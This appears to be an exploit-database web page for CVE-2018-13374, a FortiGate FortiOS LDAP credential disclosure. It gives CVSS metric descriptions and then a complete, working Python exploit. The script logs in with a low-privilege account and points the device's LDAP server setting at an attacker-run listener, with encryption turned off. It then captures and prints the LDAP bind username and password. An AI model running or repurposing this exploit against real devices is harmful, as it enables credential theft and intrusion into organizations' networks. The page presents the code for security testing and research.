The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
None
I
There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Below is a copy: FortiGate FortiOS LDAP Credential Disclosure
#/usr/bin/python3
"""
CVE-2018-13374
Publicado por Julio UreA+-a (PlainText)
Twitter: @JulioUrena
Blog Post: https://plaintext.do/My-1st-CVE-Capture-LDAP-Credentials-From-FortiGate-EN/
Referencia: https://fortiguard.com/psirt/FG-IR-18-157
Ejemplo: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP
Ejemplo con Proxy: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP --proxy http://127.0.0.1:8080
"""
from threading import Thread
from time import sleep
import json, requests, socket, sys, re, click
# Disable SSL Warning
requests.packages.urllib3.disable_warnings()
# To keep the Cookies after login.
s = requests.Session()
def AccessFortiGate(fortigate_url, username, password, proxy_addr):
url_login = fortigate_url+'/logincheck'
# Pass username and Password
payload = {"ajax": 1, "username":username, "secretkey":password}
# verify=False - to avoid SSL warnings
r = s.post(url_login, data=payload, proxies=proxy_addr, verify=False)
if s.cookies:
return True
else:
return False
def TriggerVuln(fortigate_url, ip, proxy_addr):
print("[+] Triggering Vulnerability")
# Access LDAP Server TAB
r = s.get(fortigate_url+'/p/user/ldap/json/',cookies=requests.utils.dict_from_cookiejar(s.cookies), proxies=proxy_addr, verify=False)
# Load the response in a json object
json_data = json.loads(r.text)
# Assign values based on FortiGate LDAP configuration
name = json_data['source'][0]['name']
username = json_data['source'][0]['username']
port = int(json_data['source'][0]['port'])
cnid = json_data['source'][0]['cnid']
dn = json_data['source'][0]['dn']
ca = json_data['source'][0]['ca-cert']
thread = Thread(target = GetCreds, args = (ip, port))
thread.start()
sleep(1)
print("[+] Username: ", username)
# Create json object for the vulnerable request, changing the server and setting up secure to 0
ldap_request = {"info_only":1,"mkey":name,"ldap":{"server":ip,"port":port,"cn_id":cnid,"username":username,"dn":dn,"secure":0,"ca":ca,"type":2}}
# Trigger the vulnerability
r = s.get(fortigate_url+'/api/ldap?json='+str(ldap_request), cookies=requests.utils.dict_from_cookiejar(s.cookies),proxies=proxy_addr, verify=False)
r.close()
def GetCreds(server, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Allow to reuse the server/port in case of: OSError: [Errno 98] Address already in use
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_address = (server, port)
sock.bind(server_address)
sock.listen()
credentials = ''
while True:
print('[+] Waiting Fortigate connection ...')
c, client_address = sock.accept()
try:
while True:
data = c.recv(1024)
credentials = str(data)
# \\x80\\ was common with 3 different passwords / user names, that's why it's been used as reference.
# It separe the username and the password
ldap_pass = re.sub(r'.*\\x80\\','',credentials) #.replace("'","")
print("[+] Password: ", ldap_pass[3:-1])
break
finally:
c.shutdown(socket.SHUT_RDWR)
c.close()
sock.shutdown(socket.SHUT_RDWR)
sock.close()
if credentials:
break
def print_help(self, param, value):
if value is False:
return
click.echo(self.get_help())
self.exit()
@click.command()
@click.option('-f', '--fortigate-url', 'fortigate_url', help='FortiGate URL.', required=True)
@click.option('-u', '--username', 'username', help='Username to login into Fortigate. It can be a read only user.', required=True)
@click.option('-p', '--password', 'password', help='Password to login into FortiGate.', required=True)
@click.option('-i', '--ip', 'ip', help='Host IP to send the credentails.', required=True)
@click.option('-pr', '--proxy', 'proxy', default=None, help='Proxy protocol and IP and Port.', required=False)
@click.option('-h', '--help', 'help', help='Help', is_flag=True, callback=print_help, expose_value=False, is_eager=False)
@click.pass_context
def main(self, fortigate_url, username, password, ip, proxy):
if not fortigate_url and not username and not password:
print_help(self, None, value=True)
print("[-] For usage reference use --help")
exit(0)
# Configure Proxy For Web Requests
proxy_addr = {
'http': proxy,
'https': proxy
}
message = """[+] CVE-2018-13374
[+] Publicado por Julio UreA+-a (PlainText)
[+] Blog: https://plaintext.do
[+] Referencia: https://fortiguard.com/psirt/FG-IR-18-157
"""
print(message)
if AccessFortiGate(str(fortigate_url),username, password, proxy_addr):
print("[+] Logged in.")
sleep(1)
TriggerVuln(str(fortigate_url), ip, proxy_addr)
else:
print("[-] Unable to login. Please check the credentials and Fortigate URL.")
exit(0)
if __name__ == "__main__":
main()
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum